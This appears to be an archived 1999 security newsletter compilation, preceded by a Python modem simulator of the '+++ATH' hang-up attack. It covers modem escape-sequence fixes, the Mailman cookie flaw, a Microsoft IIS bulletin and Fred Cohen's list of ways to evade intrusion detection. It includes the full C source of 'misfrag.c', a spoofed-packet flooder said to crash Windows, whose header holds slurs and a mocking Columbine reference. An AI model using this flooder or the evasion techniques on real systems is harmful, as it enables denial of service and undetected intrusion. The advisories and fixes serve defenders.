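        if not line.startswith("AT"):
            return                              # a real modem answers ERROR here
        for cmd in re.findall(r"H0?|O|Z|S\d+=\d+", line[2:]):
            if cmd.startswith("H"):
                self.online = False             # ATH / ATH0: hang up
            elif cmd == "O":
                self.cmdmode = False            # ATO: back to data mode
            elif cmd == "Z":
                self.s2, self.s3, self.s12 = 43, 13, 50
            else:
                reg, val = re.match(r"S(\d+)=(\d+)", cmd).groups()
                setattr(self, "s" + reg, int(val))  # ATSn=v writes S register n

    def locked_out(self):
        """After ATS3=128 no 7-bit byte can ever terminate a command again (Rentzsch's trick)."""
        return self.cmdmode and self.s3 > 127


# constructed e-mail carrying the sequence in-band, with no pauses around it
EMAIL = "Subject: test\r\n\r\n+++ATH\r\nsee you\r\n"


def ties_modem_drops_carrier():
    return Modem(ties=True).feed([(0.0, EMAIL)]).online                     # False

def guard_time_modem_keeps_carrier():
    m = Modem(ties=False, s12=50).feed([(0.0, EMAIL)])
    return m.online and m.delivered == EMAIL                                # True

def guard_time_modem_honours_real_escape():
    m = Modem(ties=False).feed([(0.0, "hello"), (1.2, "+++"), (1.0, "ATH\r")])
    return not m.online                                                     # True

def s2_workaround_keeps_dtr_hangup():
    m = Modem(ties=True, s2=128).feed([(0.0, EMAIL)])
    survived = m.online and m.delivered == EMAIL
    m.dtr_drop()                        # disconnecting via DTR is unaffected by S2
    return survived and not m.online                                        # True

def s3_lockout():
    m = Modem(ties=True).feed([(0.0, "+++ATS3=128\r")])
    m.feed([(0.0, "ATO\r"), (0.0, "ATZ\r")])    # nothing can terminate a command now
    return m.locked_out() and m.online                                      # True
```

The five scenario functions are the thread in miniature: the same message hangs up the time-independent modem and passes untouched through the guard-time one; a properly paced "+++" still escapes on the guard-time modem; with S2 above 127 the message is delivered and the DTR hang-up the connect scripts rely on still works; and after ATS3=128 the modem accepts bytes forever without executing anything, which is why a power cycle or restart is the only way back.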
Date: Fri, 25 Jun 1999 07:58:28 -0400
Subject: Modem Security flaw
From: Steve Crossman

Hi Ric,

I just wanted to say that the S2=127 added to the initialization string of my modem in my G3-233 Wallstreet PowerBook has fixed the problem you had described. I also don't get knocked offline anymore, which was so frequent that I thought I had a bad modem or phone line. It is hard to believe GV & Apple could engineer something like this into the PB with this kind of problem. Thanks to your page for the fix.

Steve Crossman

Date: Thu, 24 Jun 1999 21:05:59 -0400
From: M J McCaffrey
Subject: GV 56K + + + ATH fix script

Ric--

I have successfully modified the "PowerBook G3 Internal 56K" ARA connect script to implement the S2 register setting described by several readers as a "fix" for the guard-time attack. I have tested it on my own system (a PowerBook G3 Series/250 with the 56K internal modem) both with the original script and the modified script, and am satisfied it fixes the problem. (I tested by sending an e-mail to myself with the problem string in the body of the message -- sure enough, with the original I'm knocked offline immediately, and with the modified script it's no longer a problem.)

I have posted the script at the following URL:

/modemFix/index.html

The script itself is about a 40K download. Please consider making this available to your readers in your next edition.

Thanks!
--Matt McCaffrey

PS: I have had this problem since I started using my internal modem on 56K lines, and it has bugged the living daylights out of me. Thank you for helping get the word out! (And as always, thanks for MacInTouch!)

Date: Fri, 25 Jun 1999 17:38:02 -0700
From: Kent Sorensen
Subject: Snak version 3.0.1 is released - IRC Client for Mac

Dear Editor,

Snak is a full featured IRC client with some unique and very useful features. It's fast, efficient and eas
y to use, and it is being updated and enhanced regularly.
Version 3.0.1 has now been released and can be downloaded from [www.snak.com]

This version blocks the so-called ATH attack from disconnecting your modem via IRC. The attack uses a flaw in some modems to cause it to disconnect, by sending it a particular string of text. This string is now stopped and changed, so the modem will not react to it.
...

From: Mitchell Burnside Clapp
Date: Fri, 25 Jun 1999 13:17:31 EDT
Subject: Modem Guard Mode/Security defect: Fix for AOL users

For AOL users, the modem script in the system folder is apparently never called. The AOL client does its own modem configuration. To implement the S2=128 fix discussed on MacInTouch, you need to select the setup button from your sign on screen. Select the "Expert Setup", "Edit," "Modem Options," and "Advanced settings" buttons in order. Type the characters "S2=128" at the end of the string of letters in the "Configuration" box. Save your way back out to the sign on screen. (You may be asked to save the modem settings as a copy under a new name. I called mine "GV Internal modem 56K fix" and double-checked to make sure it was selected as the modem for the location I was editing.)

I was able to send myself e-mail containing the infamous "+ + + A T H" sequence without getting dropped, whereas before it was a reliable way of kicking me off-line every time.

Mitchell Burnside Clapp
CEO
Pioneer Rocketplane

Background Information

From: "Wong, Robert"
Subject: modem guard problem
Date: Thu, 24 Jun 1999 10:35:53 -0700

Hi,

A long time ago, I used to administer the ZyXEL modem FAQ. One of the questions was about how the ZyXEL modems dealt with the modem guard sequence. If you read onwards, you will notice an excerpt from BoardWatch mag. This excerpt describes how ZyXEL got around the Hayes patent.

RWW.

Subject: T.6 How do ZyXEL modems deal with escape sequences?

Byte Magazine, V18, N8, July 1993, pg 184 has a good background article about escape sequences.
The information below is a less technical explanation of escape sequences.

An escape sequence switches a modem from transmission mode to command mode. Sometimes, an AT command needs to be issued to the modem when it is on-line and connected with another modem. Since the modem is on-line, typing an AT command would send the AT command down the connection to the other modem. Thus the local modem never receives and acts on the AT command. An escape sequence is needed to bring the local modem into command mode (without dropping the connection to the other modem).

One escape sequence is to drop the DTR (Data Terminal Ready) signal on one of the wires in the serial cable. This is a reliable escape sequence. Some hardware platforms do not have a wire for the DTR signal and therefore cannot perform this escape sequence. Another type of escape sequence is needed.

An alternate escape sequence is a pause, followed by three escape characters, and then another pause. This escape sequence then puts the modem into command mode, allowing entry of AT commands. (The pauses prevent the modem from mistaking escape characters in the data stream for "true" escape characters in an escape sequence.)

Hayes has a patent on the pause, escape characters, and pause technique. Other modem manufacturers are required to pay royalties to Hayes for use of its patent. Some modem makers are not using the Hayes patent or any other method of distinguishing real escape characters. This causes factory configured modems from these modem manufacturers to inadvertently go into command mode when the Hayes test file is transmitted.

Taken from Byte Magazine, V18, N8, July 1993, pg 184 without permission:

"Zyxel [sic] has its own algorithm, for which it claims compatibility with existing code. Since the Zyxel [sic] algorithm is proprietary, we can't comment on its strength or weakness. However, it caused no problem in our testing."
Taken from BoardWatch Magazine, V6, N9, November 1992 without permission:

"To illustrate the technical elegance of this [ZyXEL] modem, recall our article on the Hayes brouhaha over their fixed guard time escape sequence under the Heatherington 302 patent. Hayes has licensed numerous modem manufacturers to use this escape sequence. A few have not licensed it and often, their modems will escape to command mode while transmitting files containing +++ escape sequences. Hayes caused something of a furor in July by releasing a text file that if transmitted by many modems that don't use the guard time escape sequence technique, would abort the transfer and improperly escape to command mode. Multitech's modems fail the test rather awkwardly. The ZyXEL modem does NOT license the Hayes escape sequence. According to Gordon Yang, they use a proprietary variable sampling algorithm that does the job at least as well. We tried the ZyXEL on the Hayes test file - and sure enough, it worked like a champ. ZyXEL appears to have engineered a way around the escape sequence controversy. Yang indicates that they could conceivably publish the algorithm. If they did, this would take some serious steam out of the Hayes licensing program."

Robert Wong

O'Reilly's dictionary of data communications terms includes a discussion of escape guard systems under "TIES" - Time Independent Escape Sequence

100.0 Another government server cracked today
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 26th

From www.403-security.org

Another NASA site got hacked
Astral 26.06.1999 22:25

Today another NASA site was hacked; it is http://microgravity.msfc.nasa.gov/ this time. Keebler hacked all these government sites in the last few weeks. This is just another hacked site in a series of government website hacks. Check the archive of this hack in the Hacked Sites section.
http://www.403-security.org/Htmls/hacked_sites.htm

@HWA

101.0 MailMan.cookie attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 26th from PacketStorm Security

http://www.python.org/pipermail/mailman-developers/1999-June/001128.html

John Morton jwm@plain.co.nz
Thu, 10 Jun 1999 18:14:42 +1200 (NZST)

[Didn't see this problem discussed in the recent archive messages, so...]

I was looking at the code for the admin cgi in search of a good cookie authentication system, and found out that it was doing this,

    c = Cookie.Cookie( os.environ['HTTP_COOKIE'] )
    if c.has_key(list_name + "-admin"):
        if c[list_name + "-admin"].value == `hash(list_name)`:
            return 1

...to authenticate based on a cookie. This code is from 1.0b8, but it only took a couple of minutes to set the appropriate wafer in my junkbuster configuration, and point netscape at the admin page for mailman-developers. I'll leave the replication of this exploit as an exercise for the readers.

Possible solutions:

Lock down that url with whatever security features your web server has. This sucks as a long term solution, but it should protect from disgruntled script kiddies that you just chucked off your lists.

Make the value based on a hash of some slow changing system variable. Something that changes with the frequency of your desired expire time, for example. Maybe a cron job to set a key based on some fast changing system stats every hour or so.

Use SSL for the admin interface and save the name and password in the cookie.

Any better suggestions?

John.

---------------------------------------------------------------------------

Date: Tue, 22 Jun 1999 21:06:34 -0700
From: debian-security-announce@LISTS.DEBIAN.ORG
Reply-To: security@debian.org
Subject: [SECURITY] New versions of mailman fixes cookie attack

-----BEGIN PGP SIGNED MESSAGE-----

We have become aware that the version of mailman as supplied in Debian GNU/Linux 2.1 has a problem with verifying list administrators.
The problem is that the cookie value generation used was predictable, so using forged authentication cookies it was possible to access the list administration webpages without knowing the proper password.

More information about this vulnerability can be found at
http://www.python.org/pipermail/mailman-developers/1999-June/001128.html

This has been fixed in version 1.0rc2-5. We recommend you upgrade your mailman package immediately.

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

Debian GNU/Linux 2.1 alias slink
- --------------------------------

This version of Debian was released only for Intel, the Motorola 680x0, the alpha and the Sun sparc architecture.

Source archives:
  http://security.debian.org/dists/stable/updates/binary-source/mailman_1.0rc2-5.diff.gz
    MD5 checksum: 096d96ebf89341b148d2ae917037559a
  http://security.debian.org/dists/stable/updates/binary-source/mailman_1.0rc2-5.dsc
    MD5 checksum: a407c72b6d80163b04ddc5fb895b8fbd
  http://security.debian.org/dists/stable/updates/binary-source/mailman_1.0rc2.orig.tar.gz
    MD5 checksum: 6916959db9144ecaf004fcd9be32a020

Alpha architecture:
  http://security.debian.org/dists/stable/updates/binary-alpha/mailman_1.0rc2-5_alpha.deb
    MD5 checksum: 0f053b62d9dd51d4e2c0843258eee453

Intel ia32 architecture:
  http://security.debian.org/dists/stable/updates/binary-i386/mailman_1.0rc2-5_i386.deb
    MD5 checksum: d9b0f93458a41055ba1b39891e0a5ca5

Motorola 680x0 architecture:
  http://security.debian.org/dists/stable/updates/binary-m68k/mailman_1.0rc2-5_m68k.deb
    MD5 checksum: 94fc7996e4b296a4c944fe08ccb44503

Sun Sparc architecture:
  http://security.debian.org/dists/stable/updates/binary-sparc/mailman_1.0rc2-5_sparc.deb
    MD5 checksum: e27d100b24d0c87c02cc86b7aadded0d

These files will be copied into ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon.

Please note you can also use apt to always get the latest security updates.
To do so add the following line to /etc/apt/sources.list:
  deb http://security.debian.org/ stable updates

- -- 
Debian GNU/Linux      .    Security Managers     .   security@debian.org
debian-security-announce@lists.debian.org
Christian Hudon  .  Wichert Akkerman  .  Martin Schulze

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQB1AwUBN3Av9KjZR/ntlUftAQFFjwL/VwNslEzha3yT4k3wwDSedm0XEiHIUCS1
+ngWFIrPnLzfJ/jK2atXAZc98wwFxjxOTDWnGuc4RBjRi4NqBduQsVwaIHelSbK2
u9uPiNvzUhPiCUdzDusjy8ysUmzJIHd8
=PgQB
-----END PGP SIGNATURE-----

-- 
To UNSUBSCRIBE, email to debian-security-announce-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

@HWA

102.0 misfrag.c nasty piece of code from P.A.T.C.H
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
 *  [*]  P.A.T.C.H.  [*]
 *  P e o p l e   A l l - f o r   t o o l s   c a u s i n g   h e l l
 */

/*********************************************************************
 *
 *                         P.A.T.C.H.
 *                    t h e   b r i g a d e
 *                 [http://thebrigade.8m.com]
 *
 * coded by misteri0 from P.A.T.C.H.
 * [mailto:leet@ibw.com.ni]
 *
 * Description: [ Sends 2 packets per packet that you give out ]
 *              [ and per every packet it increments the dest/source port by 1 ]
 *              [ the packets are spoofed, and it sends 1 packet using TH_SYN and another with TH_ACK ]
 *              [ crashes operating systems: Windows NT4 / Win95 / Win98 ]
 *              [ crashed a Windows NT4 / Win95 / Win98 from my computer sending 2000 packets starting from 0 ports ]
 *
 * greets: codesearc, Nforcer, Punk182, everyone in #ehforce, Evilfurby, ^clAw^
 *         people in #bitchx, folks in #c, and the lame people in #nicaragua for being such dicks
 *         with me which if it wasn't for them I would not have decided to code
 *
 * fuck u's: Ellison you stupid cocksucking piece of shit son-of-a-bitch, I wish you nothing but pain.
 *           Nsurfer~1 for being the lamest BO user ever
 *           the fuckheads in #trenchcoatmafia (hey code you remember how they fell like rocks?? :-))
 *
 *******************************************************************************************************/

/*--------- code ----------- */

#define _BSD_SOURCE     /* BSD compatibility */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

struct pseudo {
    u_long  saddr;
    u_long  daddr;
    u_char  zero;
    u_char  protocol;
    u_short length;
};

unsigned short
in_cksum (unsigned short *ptr, int nbytes)
{
    register long    sum;       /* assumes long == 32 bits */
    u_short          oddbyte;
    register u_short answer;    /* assumes u_short == 16 bits */

    /*
     * Our algorithm is simple, using a 32-bit accumulator (sum),
     * we add sequential 16-bit words to it, and at the end, fold back
     * all the carry bits from the top 16 bits into the lower 16 bits.
     */
    sum = 0;
    while (nbytes > 1) {
        sum += *ptr++;
        nbytes -= 2;
    }

    /* mop up an odd byte, if necessary */
    if (nbytes == 1) {
        oddbyte = 0;                                /* make sure top half is zero */
        *((u_char *) &oddbyte) = *(u_char *) ptr;   /* one byte only */
        sum += oddbyte;
    }

    /*
     * Add back carry outs from top 16 bits to low 16 bits.
     */
    sum = (sum >> 16) + (sum & 0xffff);   /* add high-16 to low-16 */
    sum += (sum >> 16);                   /* add carry */
    answer = ~sum;                        /* ones-complement, then truncate to 16 bits */
    return (answer);
}

int sendpack(int s, u_long srcaddr, u_short srcport, u_long dstaddr,
             u_short dstport, u_short th_flags, u_char *packet, u_long length)
{
    u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)];
    struct sockaddr_in foo;
    struct in_addr srcinaddr, dstinaddr;
    struct ip *ip = (struct ip *) packet;
    struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip));
    struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip) + sizeof(struct pseudo));

    bzero(packet, sizeof(packet));
    bzero(&foo, sizeof(foo));

    /* only BSD, linux has plain u_long declared */
    srcinaddr.s_addr = srcaddr;
    dstinaddr.s_addr = dstaddr;

    /* building packets */
    pseudo->saddr = srcaddr;
    pseudo->daddr = dstaddr;
    pseudo->zero = 0;
    pseudo->protocol = IPPROTO_TCP;
    pseudo->length = htons(sizeof (struct tcphdr));

    ip->ip_v = 4;           /* 4 */
    ip->ip_hl = 5;          /* 5 */
    ip->ip_id = 1234;       /* 1234 */
    ip->ip_src = srcinaddr;
    ip->ip_dst = dstinaddr;
    ip->ip_p = IPPROTO_TCP;
    ip->ip_ttl = 40;        /* 40 */
    ip->ip_off = 0;
    ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr) + length;

    tcp->th_sport = htons(srcport);
    tcp->th_dport = htons(dstport);
    tcp->th_seq = htonl(rand());
    tcp->th_ack = htonl(rand());
    tcp->th_off = 1;
    tcp->th_flags = th_flags;
    tcp->th_urp = 0;        /* 0 */
    tcp->th_sum = in_cksum((u_short *) pseudo, sizeof(struct pseudo) + sizeof(struct tcphdr));

    bcopy(tcp, pseudo, sizeof(struct tcphdr));

    foo.sin_family = AF_INET;
    foo.sin_addr.s_addr = dstaddr;
    sendto(s, packet, sizeof(struct ip) + sizeof(struct tcphdr) + length, 0,
           (struct sockaddr *) &foo, sizeof(foo));
    return 0;
}

void usage(char *name)
{
    fprintf(stderr, "\x1B[0;34mP.A.T.C.H. production - misteri0\x1B[0;0m\n");
    fprintf(stderr, "\x1B[1;36mUsage: \x1B[0;31m%s \x1B[1;32m[\x1B[0;36msrcip\x1B[1;32m] \x1B[1;32m[\x1B[0;36msrc start port\x1B[1;32m] \x1B[1;32m[\x1B[0;36mdstip\x1B[1;32m] \x1B[1;32m[\x1B[0;36mdst start port\x1B[1;32m] \x1B[1;32m[\x1B[0;36mcount\x1B[1;32m]\x1B[0;0m\n", name);
    fprintf(stderr, "\x1B[0;35mNote: \x1B[0;33mThe source/destination ports will increment by 1\x1B[0;0m\n");
    exit(1);
}

u_long resolve_name(char *hostname)
{
    struct hostent *host;
    u_long addr;

    if ((addr = inet_addr(hostname)) != -1)
        return addr;
    if ((host = gethostbyname(hostname)) == NULL) {
        fprintf(stderr, "Can not resolve name: %s\n", hostname);
        exit(1);
    }
    bcopy(host->h_addr, &addr, host->h_length);
    return addr;
}

int main(argc, argv)
int argc;
char **argv;
{
    int rawfd, rd, rsize;
    int count;
    /* don't know why I made it so complicated, *sigh* oh well, gets the job done.. */
    int one = 1;
    u_char buf[1024];
    struct sockaddr_in raddr;
    struct ifreq ifr;
    struct in_addr srcip, dstip;
    u_short srcport, dstport;

    if (argc != 6)
        usage(argv[0]);

    srcip.s_addr = resolve_name(argv[1]);
    srcport = atoi(argv[2]);
    dstip.s_addr = resolve_name(argv[3]);
    dstport = atoi(argv[4]);

    if ((rawfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) {
        perror("RawSocket:");
        exit(1);
    }
    if (setsockopt(rawfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0) {
        perror("SetSockOpt:");
        close(rawfd);
        exit(1);
    }

    count = 0;
    while (atoi(argv[5]) > count) {
        count++;
        printf("sending packet from: %s:%i ", inet_ntoa(srcip), srcport);
        printf("to %s:%i\n", inet_ntoa(dstip), dstport);
        /* think about it, =-) */
        srcport = srcport + 1;
        dstport = dstport + 1;
        sendpack(rawfd, srcip.s_addr, srcport, dstip.s_addr, dstport, TH_SYN, NULL, 0);
        sendpack(rawfd, srcip.s_addr, srcport, dstip.s_addr, dstport, TH_ACK, NULL, 0);
        usleep(1000);
    }

    /*
    printf("starting..");
    for (;;) {
        printf("foo..");
        fflush(stdout);
        if ((rd = recvfrom(rawfd, buf, 1024, 0, (struct sockaddr *) &raddr, &rsize)) < 0)
            break;
        printf("%i\n", rd);
    }
    */
    close(rawfd);
    return (0);
}

103.0 Double-byte code vulnerability, MS Security Bulletin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 25 Jun 1999 10:18:46 -0700
From: aleph1@UNDERGROUND.ORG
To: BUGTRAQ@netspace.org
Subject: Microsoft Security Bulletin (MS99-022)

The following is a Security Bulletin from the Microsoft Product Security
Notification Service.

Please do not reply to this message, as it was sent from an unattended
mailbox.
                              ********************************

Microsoft Security Bulletin (MS99-022)
--------------------------------------

Patch Available for "Double Byte Code Page" Vulnerability

Originally Posted: June 24, 1999

Summary
=======
Microsoft has released a patch that eliminates a vulnerability in
Microsoft(r) Internet Information Server that could allow a web site
visitor to view the source code for selected files on the server, if the
server's default language is set to Chinese, Japanese or Korean.

Frequently asked questions regarding this vulnerability can be found at
http://www.microsoft.com/security/bulletins/MS99-022faq.asp

Issue
=====
When IIS is run on a machine on which a double-byte character set code
page is used (i.e., the default language on the server is set to Chinese,
Japanese, or Korean), and a specific URL construction is used to request
a file in a virtual directory, normal server-side processing is bypassed.
As a result, the file is simply delivered as text to the browser, thereby
allowing the source code to be viewed.
Affected Software Versions
==========================
 - Microsoft Internet Information Server 3.0 and 4.0, if run on a server
   whose default language is set to Chinese, Korean, or Japanese

Patch Availability
==================
 - English:
   ftp://ftp.microsoft.com/bussys/iis/iis-public/
   fixes/usa/security/fesrc-fix
 - Simplified Chinese:
   ftp://ftp.microsoft.com/bussys/iis/iis-public/
   fixes/chs/security/fesrc-fix
 - Traditional Chinese:
   ftp://ftp.microsoft.com/bussys/iis/iis-public/
   fixes/cht/security/fesrc-fix
 - Japanese:
   ftp://ftp.microsoft.com/bussys/iis/iis-public/
   fixes/jpn/security/fesrc-fix
 - Korean:
   ftp://ftp.microsoft.com/bussys/iis/iis-public/
   fixes/kor/security/fesrc-fix

NOTE: Line breaks have been inserted into the above URLs for readability

NOTE: Apply the patch corresponding to the language version of IIS,
rather than the current default language on the server. For example, if
you have the English version of IIS but have reset the default language
on the server to Chinese, apply the English patch.

More Information
================
Please see the following references for more information related to this
issue.
 - Microsoft Security Bulletin MS99-022: Frequently Asked Questions,
   http://www.microsoft.com/security/bulletins/MS99-022faq.asp.
 - Microsoft Knowledge Base (KB) article Q233335, "Page Contents Visible
   When Certain Characters are at End of URL",
   http://support.microsoft.com/support/kb/articles/q233/3/35.asp.
   (Note: It may take 24 hours from the original posting of this bulletin
   for the KB article to be visible; however, a copy will be immediately
   available in the patch folder)
 - Microsoft Security Advisor web site,
   http://www.microsoft.com/security/default.asp.
 - IIS Security Checklist,
   http://www.microsoft.com/security/products/iis/CheckList.asp.

Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Technical Support is available at
http://support.microsoft.com/support/contact/default.asp.

Revisions
=========
 - June 24, 1999: Bulletin Created.

-------------------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS
IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES,
EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT
CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER
INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS
PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS
SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME
STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR
CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT
APPLY.

(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.

*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.

For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/services/bulletin.asp. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
--------------------------------------------------------------------------------

Date: Fri, 25 Jun 1999 17:33:22 -0400
From: Russ
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Alert: Microsoft Security Bulletin (MS99-022) - Double Byte Code Page Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Ok, Microsoft released this one yesterday and I needed to get a little
clarification before I sent it on to you.

Basically, we have an unknown vulnerability against IIS on NT boxes that
have chosen an "Input Locale" of Chinese, Korean, or Japanese. These
languages all use a double-byte code page set to represent the language
characters. A "munged" URL can fool such an IIS server into providing the
source for the page instead of the display (similar to the way ::$DATA
worked).

So, if you're like me, you're wondering a couple of things:

Q: How do I know I might be affected by this?

A: If you got a version of NT for any language other than Chinese, Korean,
or Japanese, then you would have had to install the "Far East Language
Pack" to make these languages available on your machine. Then, assuming
you did install this pack, you would have to have gone into Control
Panel/Regional Settings/Input Locale, and actually chosen one of them as
your default language. If you haven't done this, be not afraid.

The other way is if you got a Chinese, Korean, or Japanese version of NT
and have left the Input Locale to that language (or have chosen one of the
other languages). If, however, you have chosen, e.g. EN (English), then
you're not susceptible. Confused yet?

Of course it also goes without saying that you have to be running IIS on
this box too.

Q: What is the attack?

A: Wouldn't we all like to know. This one is internally discovered by MS,
so we don't have any details of what exactly is the vulnerability (other
than knowing you're subject to the vulnerability using the products
described above). Good show for MS telling us about the patch, we'll see
if they can come clean on some level of detail of the actual
exploit...would really show how much the MS Security approach has changed,
wouldn't it...;-]

MS99-022 FAQ
http://www.microsoft.com/security/bulletins/MS99-022faq.asp

Patches at ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
  English:              usa/security/fesrc-fix
  Simplified Chinese:   chs/security/fesrc-fix
  Traditional Chinese:  cht/security/fesrc-fix
  Japanese:             jpn/security/fesrc-fix
  Korean:               kor/security/fesrc-fix

Sorry for the delay in bringing you this rather sparse amount of
additional info.

Cheers,
Russ - NTBugtraq Editor

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2

iQA/AwUBN3P1o8+Ua7J6A+woEQIb/wCgkaPzuN3yAPxsbdSSYAatsZkGgiUAoI+O
eDCaxqG/VC+pDg1q0mdLwTLN
=F7rQ
-----END PGP SIGNATURE-----

104.0 50 Ways to defeat your IDS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

By Fred Cohen

Managing Network Security
50 Ways to Defeat Your Intrusion Detection System
by Fred Cohen of Fred Cohen & Associates (fc@all.net)
http://all.net/

Series Introduction

Over the last several years, computing has changed to an almost purely
networked environment, but the technical aspects of information
protection have not kept up. As a result, the success of information
security programs has increasingly become a function of our ability to
make prudent management decisions about organizational activities.
Managing Network Security takes a management view of protection and seeks
to reconcile the need for security with the limitations of technology.

Background and Introduction:

This article is based on a short piece I wrote a few weeks ago on an
airplane on the way back from the National Computer Security Center /
National Institute of Science and Technology conference.
I was one of 12 speakers on a panel discussion about how to protect
networks when the style of computing involves loading untrusted
executable programs from over the Internet into network browsers running
on computers inside the firewall. At some point during that panel
discussion I stated that, while the idea of intrusion detection systems
was an interesting one and one that should be followed as a possible
candidate for helping to address this challenge, current systems were so
poor as to be not worth the effort to implement them. (My actual words
were a bit less polite, but you get the idea).

After the panel, I had to go to the airport straight away to make my
plane. When I sat down, I was surprised to find both the editor (Richard
Power) and director (Patrice Rapaulus) of the Computer Security Institute
sitting in the next row taking the same set of flights back to San
Francisco. As we discussed the conference and I mentioned the limited
abilities of intrusion detection systems, Richard joked that I could
write an article on the 50 ways to bypass intrusion detection systems. I
had written the 50 Ways to Attack Your World Wide Web Systems a few years
earlier just before their fall conference. I know Richard was surprised
when I asked him when he needed it. The deadline was in a few days and,
since the plane ride was several hours long and I had my pocket computer
in my pocket, I told him I’d have it for him before the first stop
(Dallas - Fort Worth). I started typing and every few attacks read them a
sample, they laughed at the funnier ones, and it made the plane ride a
bit more pleasant for an hour or so. When I finished the 50 ways (plus a
few bonus ways) I read the whole piece to them, they laughed at the
funnier parts, and Richard had it in his email before he got home.

Here then is the piece, more or less as it was when I Emailed it to them,
complete with the original introduction. It was my hope then as it is my
hope now that you will both enjoy the humor in these weaknesses and
appreciate the seriousness underlying them at the same time.

Original Introduction:

In my ongoing attempt to cover the legal bills associated with trying to
get Netscape to pay the $50,000 they should owe me for demonstrating 50
ways to attack World Wide Web systems a few years back, I have been
forced to write articles such as this one for trade rags such as this
one. In keeping with this most serious of tones, I introduce here, 50
ways to defeat modern (i.e., stone aged) intrusion detection systems.

Background:

From a standpoint of the network security manager, it is often difficult
to tell the wheat from the chaff when selecting products or deciding on
capabilities. The current situation in intrusion detection is that very
few managers know how to make a proper decision and vendors seem to be
taking advantage of this knowledge vacuum to make sales. I have heard
many claims and a wide range of prices for these systems, but the plain
truth is that most current intrusion detection technologies and systems
available to the average buyer are poor at best. This seems to me to be a
case where the emperor has no clothes. Since exposing naked emperors is
one of my goals in life, I thought it might be useful to provide
decision-makers with some ammunition to use in evaluating candidate
systems. While I hope my playful tone is understood, the issues
underlying these examples are serious and these examples are only the tip
of the iceberg.

The 50 Ways:

1 - Inserting extraneous characters into a standard attack typically
causes detection failure. As an example, you could insert the string
‘&& true’ into a typical shell command line without ill effect on
operation but with degraded IDS performance.

2 - Use tabs instead of spaces in commands. Since most current systems
don’t interpret all separators in the same way, changing to non-standard
separators can make them fail. You might also try ‘,’ instead of ‘;’ in
the Unix shell.

3 - Closely related to number 2, you could change the separator character
in the system so that (for example) % is the separator. This would
confuse detection systems almost without exception.

4 - Reorder a detected attack sequence. For example, if the attack goes
‘a;b;c’ and it would also work as ‘b;a;c’, most detection systems would
rank the one they were not tuned to find as unlikely to be an actual
attack.

5 - Split a standard attack across more than one user. Using the ‘a;b;c’
example above, if user X types ‘a;b’ and user Y types ‘c’ the attack is
almost certain to go undetected.

6 - Split a standard attack across multiple sessions. Login once and type
‘a;b’, logout, then login and type ‘c’.

7 - Split across multiple remote IP addresses/systems. Login from sites X
and Y, and type ‘a’ from site X, ‘b’ from site Y, and ‘c’ from site X.

8 - Define a macro for a command used in a standard attack. For example,
set a shell variable called ‘$ZZ’ to ‘cp’ and then use ‘$ZZ’ instead of
‘cp’ where appropriate.

9 - Define a macro for a parameter in a standard attack. For example, use
the name ‘$P’ instead of the string ‘/etc/passwd’.

10 - Create shell scripts to replace commands you use. If you do this
carefully, the detector will not associate the names you use for the
scripts to the commands and will miss the whole attack.

Bonus attack - Add comments to attack lines in an attack that would
otherwise be detected.

11 - Use different commands to do the same function. For example,
‘echo *’ is almost the same as ‘ls’ in the Unix shell.

12 - Change the names in standard attacks. For example, if the standard
attack uses a temporary file named ‘xxx’, try using ‘yyy’.

13 - Create a code-book translator for attack keywords. This can be done
by piping all commands through a filter program - perhaps using ‘sed’ to
do string substitution.

14 - Encode the attacks in ‘ebcdic’ and change terminal types to an
‘ebcdic’ terminal. Since all the characters are differently coded, the
detector will be unable to decode your actions.

15 - Encrypt your attacks - for example, by using the secure shell
facilities intended to increase protection by preventing snooping -
including snooping by the IDS.

